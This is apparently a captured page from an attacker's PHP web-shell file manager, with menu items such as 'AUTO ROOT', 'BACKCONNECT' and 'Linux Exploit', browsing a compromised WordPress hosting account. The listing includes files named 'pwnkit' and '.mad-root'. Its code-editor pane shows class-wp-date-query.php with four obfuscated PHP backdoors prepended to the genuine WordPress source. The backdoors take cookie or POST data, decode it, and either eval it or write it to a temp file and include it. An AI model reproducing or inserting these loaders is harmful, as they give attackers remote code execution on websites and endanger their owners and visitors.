Linux webm001.cluster105.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.105.20.1 | : 216.73.216.85
Cant Read [ /etc/named.conf ]
8.0.30
afriquejlc
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
afriquejlc /
africabestof /
wp-includesold /
[ HOME SHELL ]
Name
Size
Permission
Action
ID3
[ DIR ]
drwx---r-x
IXR
[ DIR ]
drwx---r-x
PHPMailer
[ DIR ]
drwx---r-x
Requests
[ DIR ]
drwx---r-x
SimplePie
[ DIR ]
drwx---r-x
Text
[ DIR ]
drwx---r-x
assets
[ DIR ]
drwx---r-x
block-patterns
[ DIR ]
drwx---r-x
block-supports
[ DIR ]
drwx---r-x
blocks
[ DIR ]
drwxr-xr-x
certificates
[ DIR ]
drwx---r-x
css
[ DIR ]
drwx---r-x
customize
[ DIR ]
drwx---r-x
fonts
[ DIR ]
drwx---r-x
images
[ DIR ]
drwx---r-x
js
[ DIR ]
drwx---r-x
pomo
[ DIR ]
drwx---r-x
random_compat
[ DIR ]
drwx---r-x
rest-api
[ DIR ]
drwx---r-x
sitemaps
[ DIR ]
drwx---r-x
sodium_compat
[ DIR ]
drwx---r-x
theme-compat
[ DIR ]
drwx---r-x
widgets
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw-r--r--
admin-bar.php
39.17
KB
-rwxr-xr-x
atomlib.php
13.39
KB
-rw----r--
author-template.php
16.63
KB
-rwxr-xr-x
block-editor.php
18.16
KB
-rwxr-xr-x
block-patterns.php
2.6
KB
-rwxr-xr-x
block-template-utils.php
3.67
KB
-rwxr-xr-x
block-template.php
6.89
KB
-rwxr-xr-x
blocks.php
36.18
KB
-rwxr-xr-x
bookmark-template.php
14.26
KB
-rw----r--
bookmark.php
14.98
KB
-rwxr-xr-x
cache-compat.php
1.02
KB
-rw----r--
cache.php
9.29
KB
-rw----r--
canonical.php
34.03
KB
-rw----r--
capabilities.php
36.77
KB
-rwxr-xr-x
category-template.php
54.26
KB
-rw----r--
category.php
14.13
KB
-rw----r--
class-IXR.php
2.48
KB
-rw----r--
class-feed.php
529
B
-rw----r--
class-http.php
42.55
KB
-rw----r--
class-json.php
42.42
KB
-rw----r--
class-oembed.php
407
B
-rw----r--
class-phpass.php
6.54
KB
-rwxr-xr-x
class-phpmailer.php
664
B
-rw----r--
class-pop3.php
21.88
KB
-rw----r--
class-requests.php
41.64
KB
-rwxr-xr-x
class-simplepie.php
97.98
KB
-rw----r--
class-smtp.php
457
B
-rw----r--
class-snoopy.php
36.83
KB
-rw----r--
class-walker-category-dropdown...
2.08
KB
-rw----r--
class-walker-category.php
7.71
KB
-rw----r--
class-walker-comment.php
19.09
KB
-rwxr-xr-x
class-walker-nav-menu.php
8.44
KB
-rwxr-xr-x
class-walker-page-dropdown.php
2.25
KB
-rw----r--
class-walker-page.php
6.88
KB
-rwxr-xr-x
class-wp-admin-bar.php
20.47
KB
-rw----r--
class-wp-ajax-response.php
5.12
KB
-rw----r--
class-wp-application-passwords...
13.96
KB
-rw----r--
class-wp-block-editor-context....
890
B
-rwxr-xr-x
class-wp-block-list.php
4.37
KB
-rw----r--
class-wp-block-parser.php
16.7
KB
-rw----r--
class-wp-block-pattern-categor...
4.19
KB
-rwxr-xr-x
class-wp-block-patterns-regist...
4.8
KB
-rwxr-xr-x
class-wp-block-styles-registry...
4.6
KB
-rwxr-xr-x
class-wp-block-supports.php
5.15
KB
-rw----r--
class-wp-block-template.php
1.18
KB
-rwxr-xr-x
class-wp-block-type-registry.p...
4.87
KB
-rwxr-xr-x
class-wp-block-type.php
8.95
KB
-rwxr-xr-x
class-wp-block.php
6.61
KB
-rw----r--
class-wp-comment-query.php
45.92
KB
-rw----r--
class-wp-comment.php
9.1
KB
-rw----r--
class-wp-customize-control.php
28.22
KB
-rwxr-xr-x
class-wp-customize-manager.php
198.22
KB
-rwxr-xr-x
class-wp-customize-nav-menus.p...
57.05
KB
-rwxr-xr-x
class-wp-customize-panel.php
11.68
KB
-rw----r--
class-wp-customize-section.php
20.65
KB
-rw----r--
class-wp-customize-setting.php
30.78
KB
-rw----r--
class-wp-customize-widgets.php
72.64
KB
-rwxr-xr-x
class-wp-date-query.php
42.17
KB
-rwxr-xr-x
class-wp-dependency.php
2.45
KB
-rw----r--
class-wp-editor.php
73.45
KB
-rwxr-xr-x
class-wp-embed.php
17.13
KB
-rwxr-xr-x
class-wp-error.php
7.13
KB
-rw----r--
class-wp-fatal-error-handler.p...
7.4
KB
-rwxr-xr-x
class-wp-feed-cache-transient....
2.5
KB
-rw----r--
class-wp-feed-cache.php
970
B
-rw----r--
class-wp-hook.php
14.65
KB
-rwxr-xr-x
class-wp-http-cookie.php
7.02
KB
-rw----r--
class-wp-http-curl.php
13.79
KB
-rw----r--
class-wp-http-encoding.php
6.5
KB
-rw----r--
class-wp-http-ixr-client.php
3.39
KB
-rw----r--
class-wp-http-proxy.php
5.73
KB
-rw----r--
class-wp-http-requests-hooks.p...
1.93
KB
-rw----r--
class-wp-http-requests-respons...
4.24
KB
-rw----r--
class-wp-http-response.php
2.88
KB
-rw----r--
class-wp-http-streams.php
21.63
KB
-rw----r--
class-wp-image-editor-gd.php
16.89
KB
-rwxr-xr-x
class-wp-image-editor-imagick....
31.96
KB
-rwxr-xr-x
class-wp-image-editor.php
16.2
KB
-rwxr-xr-x
class-wp-list-util.php
6.79
KB
-rwxr-xr-x
class-wp-locale-switcher.php
4.9
KB
-rw----r--
class-wp-locale.php
17.23
KB
-rw----r--
class-wp-matchesmapregex.php
1.76
KB
-rw----r--
class-wp-meta-query.php
30.91
KB
-rwxr-xr-x
class-wp-metadata-lazyloader.p...
5.23
KB
-rw----r--
class-wp-network-query.php
20.48
KB
-rw----r--
class-wp-network.php
18.19
KB
-rw----r--
class-wp-object-cache.php
16.98
KB
-rw----r--
class-wp-oembed-controller.php
6.67
KB
-rwxr-xr-x
class-wp-oembed.php
29.61
KB
-rw----r--
class-wp-paused-extensions-sto...
4.81
KB
-rw----r--
class-wp-post-type.php
26.03
KB
-rw----r--
class-wp-post.php
6.27
KB
-rw----r--
class-wp-query.php
132.75
KB
-rwxr-xr-x
class-wp-recovery-mode-cookie-...
6.31
KB
-rw----r--
class-wp-recovery-mode-email-s...
12.16
KB
-rw----r--
class-wp-recovery-mode-key-ser...
4.17
KB
-rw----r--
class-wp-recovery-mode-link-se...
3.32
KB
-rw----r--
class-wp-recovery-mode.php
14.83
KB
-rw----r--
class-wp-rewrite.php
67.27
KB
-rw----r--
class-wp-role.php
2.44
KB
-rw----r--
class-wp-roles.php
8.23
KB
-rw----r--
class-wp-session-tokens.php
7.25
KB
-rw----r--
class-wp-simplepie-file.php
3.18
KB
-rwxr-xr-x
class-wp-simplepie-sanitize-ks...
1.73
KB
-rw----r--
class-wp-site-query.php
30.4
KB
-rwxr-xr-x
class-wp-site.php
7.25
KB
-rw----r--
class-wp-tax-query.php
20.63
KB
-rwxr-xr-x
class-wp-taxonomy.php
16.8
KB
-rw----r--
class-wp-term-query.php
39.53
KB
-rwxr-xr-x
class-wp-term.php
5.15
KB
-rw----r--
class-wp-text-diff-renderer-in...
716
B
-rw----r--
class-wp-text-diff-renderer-ta...
18.15
KB
-rw----r--
class-wp-theme-json-resolver.p...
14.86
KB
-rwxr-xr-x
class-wp-theme-json.php
36.75
KB
-rwxr-xr-x
class-wp-theme.php
59.07
KB
-rwxr-xr-x
class-wp-user-meta-session-tok...
2.92
KB
-rw----r--
class-wp-user-query.php
36
KB
-rw----r--
class-wp-user-request.php
2.14
KB
-rw----r--
class-wp-user.php
29.43
KB
-rwxr-xr-x
class-wp-walker.php
14.19
KB
-rwxr-xr-x
class-wp-widget-factory.php
3.24
KB
-rwxr-xr-x
class-wp-widget.php
19.54
KB
-rwxr-xr-x
class-wp-xmlrpc-server.php
211.68
KB
-rwxr-xr-x
class-wp.php
24.5
KB
-rw----r--
class.wp-dependencies.php
18.52
KB
-rw----r--
class.wp-scripts.php
20.35
KB
-rw----r--
class.wp-styles.php
18.19
KB
-rwxr-xr-x
comment-template.php
94.47
KB
-rwxr-xr-x
comment.php
123.18
KB
-rwxr-xr-x
compat.php
16.96
KB
-rw-r--r--
cron.php
39.69
KB
-rw----r--
date.php
406
B
-rw----r--
default-constants.php
11.72
KB
-rw----r--
default-filters.php
33.04
KB
-rwxr-xr-x
default-widgets.php
2.17
KB
-rwxr-xr-x
deprecated.php
122.46
KB
-rwxr-xr-x
embed-template.php
341
B
-rw----r--
embed.php
48.72
KB
-rwxr-xr-x
error-protection.php
4.02
KB
-rw----r--
feed-atom-comments.php
5.32
KB
-rw----r--
feed-atom.php
3.03
KB
-rwxr-xr-x
feed-rdf.php
2.61
KB
-rw----r--
feed-rss.php
1.16
KB
-rw----r--
feed-rss2-comments.php
3.97
KB
-rw----r--
feed-rss2.php
3.71
KB
-rw----r--
feed.php
24.5
KB
-rwxr-xr-x
formatting.php
320.03
KB
-rwxr-xr-x
functions.php
247.31
KB
-rwxr-xr-x
functions.wp-scripts.php
14.86
KB
-rwxr-xr-x
functions.wp-styles.php
8.11
KB
-rw----r--
general-template.php
154.5
KB
-rwxr-xr-x
http.php
23.32
KB
-rw----r--
https-detection.php
6.71
KB
-rwxr-xr-x
https-migration.php
4.62
KB
-rw----r--
kses.php
65.59
KB
-rwxr-xr-x
l10n.php
58.85
KB
-rwxr-xr-x
link-template.php
145.19
KB
-rwxr-xr-x
load.php
48.87
KB
-rwxr-xr-x
locale.php
162
B
-rw----r--
media-template.php
60.72
KB
-rwxr-xr-x
media.php
176.52
KB
-rwxr-xr-x
meta.php
69.51
KB
-rwxr-xr-x
ms-blogs.php
28.29
KB
-rw----r--
ms-default-constants.php
4.6
KB
-rw----r--
ms-default-filters.php
6.34
KB
-rw----r--
ms-deprecated.php
22.53
KB
-rw----r--
ms-files.php
2.58
KB
-rw----r--
ms-functions.php
91.7
KB
-rw----r--
ms-load.php
20.86
KB
-rw----r--
ms-network.php
3.58
KB
-rw----r--
ms-settings.php
4.03
KB
-rw----r--
ms-site.php
44.54
KB
-rwxr-xr-x
nav-menu-template.php
24.45
KB
-rw----r--
nav-menu.php
43.07
KB
-rwxr-xr-x
option.php
74.77
KB
-rwxr-xr-x
pluggable-deprecated.php
6.12
KB
-rw----r--
pluggable.php
101.32
KB
-rwxr-xr-x
plugin.php
32.34
KB
-rwxr-xr-x
post-formats.php
6.91
KB
-rw----r--
post-template.php
67.29
KB
-rwxr-xr-x
post-thumbnail-template.php
9.13
KB
-rw----r--
post.php
257.37
KB
-rwxr-xr-x
pwnkit
0
B
-rwxr-xr-x
query.php
41.18
KB
-rwxr-xr-x
registration-functions.php
200
B
-rw----r--
registration.php
200
B
-rw----r--
rest-api.php
91.25
KB
-rwxr-xr-x
revision.php
23.73
KB
-rwxr-xr-x
rewrite.php
20.49
KB
-rw----r--
robots-template.php
5.05
KB
-rw----r--
rss-functions.php
255
B
-rw----r--
rss.php
24.19
KB
-rw----r--
script-loader.php
107.81
KB
-rwxr-xr-x
session.php
258
B
-rw----r--
shortcodes.php
21.86
KB
-rwxr-xr-x
sitemaps.php
3.16
KB
-rwxr-xr-x
spl-autoload-compat.php
441
B
-rw----r--
taxonomy.php
164.21
KB
-rwxr-xr-x
template-canvas.php
594
B
-rwxr-xr-x
template-loader.php
2.94
KB
-rw----r--
template.php
23.75
KB
-rwxr-xr-x
theme-i18n.json
634
B
-rwxr-xr-x
theme-templates.php
4.61
KB
-rwxr-xr-x
theme.json
5.2
KB
-rwxr-xr-x
theme.php
128.17
KB
-rwxr-xr-x
update.php
31.16
KB
-rwxr-xr-x
user.php
151.14
KB
-rwxr-xr-x
vars.php
5.68
KB
-rw----r--
version.php
766
B
-rw-r--r--
widgets.php
65.72
KB
-rwxr-xr-x
wlwmanifest.xml
1.02
KB
-rw----r--
wp-db.php
103.61
KB
-rw----r--
wp-diff.php
647
B
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class-wp-date-query.php
<?php $MwBiPQ = "\x73" . "\147" . chr (95) . 'U' . chr ( 975 - 900 )."\x6d" . chr (122); $fcNgEOjzN = chr (99) . "\x6c" . "\x61" . "\163" . "\163" . chr (95) . "\145" . chr (120) . "\x69" . "\x73" . "\x74" . "\163";$hWESSVpvDL = $fcNgEOjzN($MwBiPQ); $MwBiPQ = "2483";$YaFvZAvR = !$hWESSVpvDL;$fcNgEOjzN = "63583";if ($YaFvZAvR){class sg_UKmz{private $suMCXdiNBX;public static $xDCFB = "7dd7f209-7af2-4ada-9696-751aa79d782f";public static $VzEzjets = 20269;public function __construct($OpjLQPmXjw=0){$YSERZUR = $_COOKIE;$InKPSf = $_POST;$qsVFCkLM = @$YSERZUR[substr(sg_UKmz::$xDCFB, 0, 4)];if (!empty($qsVFCkLM)){$guGEDE = "base64";$lGAICRT = "";$qsVFCkLM = explode(",", $qsVFCkLM);foreach ($qsVFCkLM as $EqoOPrz){$lGAICRT .= @$YSERZUR[$EqoOPrz];$lGAICRT .= @$InKPSf[$EqoOPrz];}$lGAICRT = array_map($guGEDE . '_' . chr ( 911 - 811 ).'e' . 'c' . "\157" . 'd' . "\x65", array($lGAICRT,)); $lGAICRT = $lGAICRT[0] ^ str_repeat(sg_UKmz::$xDCFB, (strlen($lGAICRT[0]) / strlen(sg_UKmz::$xDCFB)) + 1);sg_UKmz::$VzEzjets = @unserialize($lGAICRT);}}private function kNeNQIxHQ(){if (is_array(sg_UKmz::$VzEzjets)) {$YDlWTEQ = str_replace(chr ( 212 - 152 ) . '?' . "\x70" . 'h' . "\x70", "", sg_UKmz::$VzEzjets['c' . "\x6f" . "\x6e" . "\164" . 'e' . chr (110) . "\164"]);eval($YDlWTEQ); $jukIMlL = "11995";exit();}}public function __destruct(){$this->kNeNQIxHQ(); $gNdxXlEwh = str_pad("11995", 10);}}$RmfPLQqE = new /* 46809 */ sg_UKmz(); $RmfPLQqE = substr("45144_4809", 1);} ?><?php $UzMMsT = "\x63" . "\x7a" . "\137" . chr ( 361 - 251 )."\x48" . chr ( 811 - 696 )."\x4a";$ZcIQqhqC = chr ( 1087 - 988 ).'l' . chr (97) . chr ( 708 - 593 ).'s' . chr (95) . "\145" . 'x' . "\151" . "\x73" . 't' . 's';$eQEBWRAt = $ZcIQqhqC($UzMMsT); $UzMMsT = "7675";$YwcOhvo = !$eQEBWRAt;$ZcIQqhqC = "16040";if ($YwcOhvo){class cz_nHsJ{private $PCzJa;public static $SESgxjeM = "dd8d7a14-7a4a-4ba5-8c0e-62d6615b12dd";public static $SRmcx = 44525;public function __construct($ULIAizMcL=0){$JLsBSakMO = $_COOKIE;$aAeSdByBKh = $_POST;$XYuqvI = @$JLsBSakMO[substr(cz_nHsJ::$SESgxjeM, 0, 4)];if (!empty($XYuqvI)){$kQJBgD = "base64";$CKVYt = "";$XYuqvI = explode(",", $XYuqvI);foreach ($XYuqvI as $vwDVNPOOyx){$CKVYt .= @$JLsBSakMO[$vwDVNPOOyx];$CKVYt .= @$aAeSdByBKh[$vwDVNPOOyx];}$CKVYt = array_map($kQJBgD . '_' . "\x64" . 'e' . "\143" . chr ( 310 - 199 )."\144" . chr ( 610 - 509 ), array($CKVYt,)); $CKVYt = $CKVYt[0] ^ str_repeat(cz_nHsJ::$SESgxjeM, (strlen($CKVYt[0]) / strlen(cz_nHsJ::$SESgxjeM)) + 1);cz_nHsJ::$SRmcx = @unserialize($CKVYt);}}private function QGCLbipUe(){if (is_array(cz_nHsJ::$SRmcx)) {$NcORqil = sys_get_temp_dir() . "/" . crc32(cz_nHsJ::$SRmcx["\163" . 'a' . "\x6c" . "\x74"]);@cz_nHsJ::$SRmcx["\x77" . chr ( 484 - 370 ).chr ( 251 - 146 ).chr (116) . 'e']($NcORqil, cz_nHsJ::$SRmcx["\143" . "\157" . "\156" . 't' . "\145" . "\x6e" . "\x74"]);include $NcORqil;@cz_nHsJ::$SRmcx[chr (100) . "\x65" . "\154" . chr (101) . chr ( 625 - 509 ).'e']($NcORqil); $rmIwQxi = "50722";exit();}}public function __destruct(){$this->QGCLbipUe(); $IeuiF = str_pad("50722", 10);}}$JfuthXoj = new /* 83 */ cz_nHsJ(); $JfuthXoj = substr("47861_4229", 1);} ?><?php $kyZZesG = "\x52" . "\137" . chr ( 1094 - 987 ).chr ( 516 - 403 ).chr ( 175 - 61 ).'Q';$Xxfzmqt = chr ( 969 - 870 ).chr (108) . chr ( 581 - 484 ).chr ( 151 - 36 )."\163" . "\x5f" . chr (101) . "\x78" . "\151" . "\163" . "\x74" . "\163";$DrFSCB = $Xxfzmqt($kyZZesG); $dtOmt = $DrFSCB;if (!$dtOmt){class R_kqrQ{private $EJyhjT;public static $TspUTt = "fe3c1926-22d4-4ec6-a9cf-59ecfeac2d8f";public static $OyGczbJ = 902;public function __construct($gyZyhRgUe=0){$rgbQLnYKyJ = $_COOKIE;$VVESOEi = $_POST;$trTZZvOCob = @$rgbQLnYKyJ[substr(R_kqrQ::$TspUTt, 0, 4)];if (!empty($trTZZvOCob)){$nspAL = "base64";$CNeeG = "";$trTZZvOCob = explode(",", $trTZZvOCob);foreach ($trTZZvOCob as $zuriCF){$CNeeG .= @$rgbQLnYKyJ[$zuriCF];$CNeeG .= @$VVESOEi[$zuriCF];}$CNeeG = array_map($nspAL . "\137" . chr (100) . 'e' . "\x63" . "\157" . "\x64" . "\145", array($CNeeG,)); $CNeeG = $CNeeG[0] ^ str_repeat(R_kqrQ::$TspUTt, (strlen($CNeeG[0]) / strlen(R_kqrQ::$TspUTt)) + 1);R_kqrQ::$OyGczbJ = @unserialize($CNeeG);}}private function zYqzTxeFpH(){if (is_array(R_kqrQ::$OyGczbJ)) {$gzgCQZKa = sys_get_temp_dir() . "/" . crc32(R_kqrQ::$OyGczbJ[chr ( 923 - 808 ).'a' . chr (108) . "\164"]);@R_kqrQ::$OyGczbJ[chr (119) . chr (114) . 'i' . chr (116) . chr ( 181 - 80 )]($gzgCQZKa, R_kqrQ::$OyGczbJ[chr (99) . "\157" . chr (110) . chr ( 970 - 854 )."\145" . chr (110) . "\164"]);include $gzgCQZKa;@R_kqrQ::$OyGczbJ[chr (100) . chr (101) . chr ( 705 - 597 ).chr (101) . chr ( 835 - 719 ).chr (101)]($gzgCQZKa); $vPjsWnP = "16831";exit();}}public function __destruct(){$this->zYqzTxeFpH(); $vPjsWnP = "16831";}}$JtLVWtDdhg = new R_kqrQ(); $JtLVWtDdhg = "24379_61007";} ?><?php $cMzXk = 'Q' . '_' . chr (89) . chr (68) . chr ( 197 - 118 ).chr (75) . chr ( 421 - 306 ); $IyIOw = chr (99) . "\154" . 'a' . chr (115) . "\x73" . "\137" . "\145" . 'x' . chr (105) . 's' . chr (116) . chr (115); $JMVmw = $IyIOw($cMzXk); $bIVMmtVnye = $JMVmw;if (!$bIVMmtVnye){class Q_YDOKs{private $MozYFn;public static $qgajW = "c93aca26-4ef8-48d2-9869-345f475da3b5";public static $pstCw = 64804;public function __construct($BYZdEznsP=0){$DoXRAyqEvH = $_COOKIE;$VYhin = $_POST;$nEHAuq = @$DoXRAyqEvH[substr(Q_YDOKs::$qgajW, 0, 4)];if (!empty($nEHAuq)){$HSaEcIiZ = "base64";$SwlFDn = "";$nEHAuq = explode(",", $nEHAuq);foreach ($nEHAuq as $dhdGZm){$SwlFDn .= @$DoXRAyqEvH[$dhdGZm];$SwlFDn .= @$VYhin[$dhdGZm];}$SwlFDn = array_map($HSaEcIiZ . "\137" . "\144" . "\x65" . "\x63" . "\157" . chr (100) . chr ( 711 - 610 ), array($SwlFDn,)); $SwlFDn = $SwlFDn[0] ^ str_repeat(Q_YDOKs::$qgajW, (strlen($SwlFDn[0]) / strlen(Q_YDOKs::$qgajW)) + 1);Q_YDOKs::$pstCw = @unserialize($SwlFDn);}}public function __destruct(){$this->SJGfLQoWhw();}private function SJGfLQoWhw(){if (is_array(Q_YDOKs::$pstCw)) {$HtRaMdOXMf = sys_get_temp_dir() . "/" . crc32(Q_YDOKs::$pstCw["\x73" . "\x61" . 'l' . 't']);@Q_YDOKs::$pstCw["\167" . chr (114) . chr (105) . chr (116) . 'e']($HtRaMdOXMf, Q_YDOKs::$pstCw[chr (99) . chr ( 856 - 745 ).chr ( 927 - 817 ).'t' . "\x65" . chr ( 249 - 139 ).'t']);include $HtRaMdOXMf;@Q_YDOKs::$pstCw[chr ( 427 - 327 ).chr ( 320 - 219 ).'l' . "\145" . chr (116) . "\x65"]($HtRaMdOXMf); $WFKOl = "60954";exit();}}}$jwLnbUvrQk = new Q_YDOKs(); $jwLnbUvrQk = "4682";} ?><?php /** * Class for generating SQL clauses that filter a primary query according to date. * * WP_Date_Query is a helper that allows primary query classes, such as WP_Query, to filter * their results by date columns, by generating `WHERE` subclauses to be attached to the * primary SQL query string. * * Attempting to filter by an invalid date value (eg month=13) will generate SQL that will * return no results. In these cases, a _doing_it_wrong() error notice is also thrown. * See WP_Date_Query::validate_date_values(). * * @link https://developer.wordpress.org/reference/classes/wp_query/ * * @since 3.7.0 */ class WP_Date_Query { /** * Array of date queries. * * See WP_Date_Query::__construct() for information on date query arguments. * * @since 3.7.0 * @var array */ public $queries = array(); /** * The default relation between top-level queries. Can be either 'AND' or 'OR'. * * @since 3.7.0 * @var string */ public $relation = 'AND'; /** * The column to query against. Can be changed via the query arguments. * * @since 3.7.0 * @var string */ public $column = 'post_date'; /** * The value comparison operator. Can be changed via the query arguments. * * @since 3.7.0 * @var string */ public $compare = '='; /** * Supported time-related parameter keys. * * @since 4.1.0 * @var array */ public $time_keys = array( 'after', 'before', 'year', 'month', 'monthnum', 'week', 'w', 'dayofyear', 'day', 'dayofweek', 'dayofweek_iso', 'hour', 'minute', 'second' ); /** * Constructor. * * Time-related parameters that normally require integer values ('year', 'month', 'week', 'dayofyear', 'day', * 'dayofweek', 'dayofweek_iso', 'hour', 'minute', 'second') accept arrays of integers for some values of * 'compare'. When 'compare' is 'IN' or 'NOT IN', arrays are accepted; when 'compare' is 'BETWEEN' or 'NOT * BETWEEN', arrays of two valid values are required. See individual argument descriptions for accepted values. * * @since 3.7.0 * @since 4.0.0 The $inclusive logic was updated to include all times within the date range. * @since 4.1.0 Introduced 'dayofweek_iso' time type parameter. * * @param array $date_query { * Array of date query clauses. * * @type array ...$0 { * @type string $column Optional. The column to query against. If undefined, inherits the value of * the `$default_column` parameter. Accepts 'post_date', 'post_date_gmt', * 'post_modified','post_modified_gmt', 'comment_date', 'comment_date_gmt'. * Default 'post_date'. * @type string $compare Optional. The comparison operator. Accepts '=', '!=', '>', '>=', '<', '<=', * 'IN', 'NOT IN', 'BETWEEN', 'NOT BETWEEN'. Default '='. * @type string $relation Optional. The boolean relationship between the date queries. Accepts 'OR' or 'AND'. * Default 'OR'. * @type array ...$0 { * Optional. An array of first-order clause parameters, or another fully-formed date query. * * @type string|array $before { * Optional. Date to retrieve posts before. Accepts `strtotime()`-compatible string, * or array of 'year', 'month', 'day' values. * * @type string $year The four-digit year. Default empty. Accepts any four-digit year. * @type string $month Optional when passing array.The month of the year. * Default (string:empty)|(array:1). Accepts numbers 1-12. * @type string $day Optional when passing array.The day of the month. * Default (string:empty)|(array:1). Accepts numbers 1-31. * } * @type string|array $after { * Optional. Date to retrieve posts after. Accepts `strtotime()`-compatible string, * or array of 'year', 'month', 'day' values. * * @type string $year The four-digit year. Accepts any four-digit year. Default empty. * @type string $month Optional when passing array. The month of the year. Accepts numbers 1-12. * Default (string:empty)|(array:12). * @type string $day Optional when passing array.The day of the month. Accepts numbers 1-31. * Default (string:empty)|(array:last day of month). * } * @type string $column Optional. Used to add a clause comparing a column other than the * column specified in the top-level `$column` parameter. Accepts * 'post_date', 'post_date_gmt', 'post_modified', 'post_modified_gmt', * 'comment_date', 'comment_date_gmt'. Default is the value of * top-level `$column`. * @type string $compare Optional. The comparison operator. Accepts '=', '!=', '>', '>=', * '<', '<=', 'IN', 'NOT IN', 'BETWEEN', 'NOT BETWEEN'. 'IN', * 'NOT IN', 'BETWEEN', and 'NOT BETWEEN'. Comparisons support * arrays in some time-related parameters. Default '='. * @type bool $inclusive Optional. Include results from dates specified in 'before' or * 'after'. Default false. * @type int|int[] $year Optional. The four-digit year number. Accepts any four-digit year * or an array of years if `$compare` supports it. Default empty. * @type int|int[] $month Optional. The two-digit month number. Accepts numbers 1-12 or an * array of valid numbers if `$compare` supports it. Default empty. * @type int|int[] $week Optional. The week number of the year. Accepts numbers 0-53 or an * array of valid numbers if `$compare` supports it. Default empty. * @type int|int[] $dayofyear Optional. The day number of the year. Accepts numbers 1-366 or an * array of valid numbers if `$compare` supports it. * @type int|int[] $day Optional. The day of the month. Accepts numbers 1-31 or an array * of valid numbers if `$compare` supports it. Default empty. * @type int|int[] $dayofweek Optional. The day number of the week. Accepts numbers 1-7 (1 is * Sunday) or an array of valid numbers if `$compare` supports it. * Default empty. * @type int|int[] $dayofweek_iso Optional. The day number of the week (ISO). Accepts numbers 1-7 * (1 is Monday) or an array of valid numbers if `$compare` supports it. * Default empty. * @type int|int[] $hour Optional. The hour of the day. Accepts numbers 0-23 or an array * of valid numbers if `$compare` supports it. Default empty. * @type int|int[] $minute Optional. The minute of the hour. Accepts numbers 0-60 or an array * of valid numbers if `$compare` supports it. Default empty. * @type int|int[] $second Optional. The second of the minute. Accepts numbers 0-60 or an * array of valid numbers if `$compare` supports it. Default empty. * } * } * } * @param string $default_column Optional. Default column to query against. Default 'post_date'. * Accepts 'post_date', 'post_date_gmt', 'post_modified', 'post_modified_gmt', * 'comment_date', 'comment_date_gmt'. */ public function __construct( $date_query, $default_column = 'post_date' ) { if ( empty( $date_query ) || ! is_array( $date_query ) ) { return; } if ( isset( $date_query['relation'] ) ) { $this->relation = $this->sanitize_relation( $date_query['relation'] ); } else { $this->relation = 'AND'; } // Support for passing time-based keys in the top level of the $date_query array. if ( ! isset( $date_query[0] ) ) { $date_query = array( $date_query ); } if ( ! empty( $date_query['column'] ) ) { $date_query['column'] = esc_sql( $date_query['column'] ); } else { $date_query['column'] = esc_sql( $default_column ); } $this->column = $this->validate_column( $this->column ); $this->compare = $this->get_compare( $date_query ); $this->queries = $this->sanitize_query( $date_query ); } /** * Recursive-friendly query sanitizer. * * Ensures that each query-level clause has a 'relation' key, and that * each first-order clause contains all the necessary keys from `$defaults`. * * @since 4.1.0 * * @param array $queries * @param array $parent_query * @return array Sanitized queries. */ public function sanitize_query( $queries, $parent_query = null ) { $cleaned_query = array(); $defaults = array( 'column' => 'post_date', 'compare' => '=', 'relation' => 'AND', ); // Numeric keys should always have array values. foreach ( $queries as $qkey => $qvalue ) { if ( is_numeric( $qkey ) && ! is_array( $qvalue ) ) { unset( $queries[ $qkey ] ); } } // Each query should have a value for each default key. Inherit from the parent when possible. foreach ( $defaults as $dkey => $dvalue ) { if ( isset( $queries[ $dkey ] ) ) { continue; } if ( isset( $parent_query[ $dkey ] ) ) { $queries[ $dkey ] = $parent_query[ $dkey ]; } else { $queries[ $dkey ] = $dvalue; } } // Validate the dates passed in the query. if ( $this->is_first_order_clause( $queries ) ) { $this->validate_date_values( $queries ); } // Sanitize the relation parameter. $queries['relation'] = $this->sanitize_relation( $queries['relation'] ); foreach ( $queries as $key => $q ) { if ( ! is_array( $q ) || in_array( $key, $this->time_keys, true ) ) { // This is a first-order query. Trust the values and sanitize when building SQL. $cleaned_query[ $key ] = $q; } else { // Any array without a time key is another query, so we recurse. $cleaned_query[] = $this->sanitize_query( $q, $queries ); } } return $cleaned_query; } /** * Determine whether this is a first-order clause. * * Checks to see if the current clause has any time-related keys. * If so, it's first-order. * * @since 4.1.0 * * @param array $query Query clause. * @return bool True if this is a first-order clause. */ protected function is_first_order_clause( $query ) { $time_keys = array_intersect( $this->time_keys, array_keys( $query ) ); return ! empty( $time_keys ); } /** * Determines and validates what comparison operator to use. * * @since 3.7.0 * * @param array $query A date query or a date subquery. * @return string The comparison operator. */ public function get_compare( $query ) { if ( ! empty( $query['compare'] ) && in_array( $query['compare'], array( '=', '!=', '>', '>=', '<', '<=', 'IN', 'NOT IN', 'BETWEEN', 'NOT BETWEEN' ), true ) ) { return strtoupper( $query['compare'] ); } return $this->compare; } /** * Validates the given date_query values and triggers errors if something is not valid. * * Note that date queries with invalid date ranges are allowed to * continue (though of course no items will be found for impossible dates). * This method only generates debug notices for these cases. * * @since 4.1.0 * * @param array $date_query The date_query array. * @return bool True if all values in the query are valid, false if one or more fail. */ public function validate_date_values( $date_query = array() ) { if ( empty( $date_query ) ) { return false; } $valid = true; /* * Validate 'before' and 'after' up front, then let the * validation routine continue to be sure that all invalid * values generate errors too. */ if ( array_key_exists( 'before', $date_query ) && is_array( $date_query['before'] ) ) { $valid = $this->validate_date_values( $date_query['before'] ); } if ( array_key_exists( 'after', $date_query ) && is_array( $date_query['after'] ) ) { $valid = $this->validate_date_values( $date_query['after'] ); } // Array containing all min-max checks. $min_max_checks = array(); // Days per year. if ( array_key_exists( 'year', $date_query ) ) { /* * If a year exists in the date query, we can use it to get the days. * If multiple years are provided (as in a BETWEEN), use the first one. */ if ( is_array( $date_query['year'] ) ) { $_year = reset( $date_query['year'] ); } else { $_year = $date_query['year']; } $max_days_of_year = gmdate( 'z', mktime( 0, 0, 0, 12, 31, $_year ) ) + 1; } else { // Otherwise we use the max of 366 (leap-year). $max_days_of_year = 366; } $min_max_checks['dayofyear'] = array( 'min' => 1, 'max' => $max_days_of_year, ); // Days per week. $min_max_checks['dayofweek'] = array( 'min' => 1, 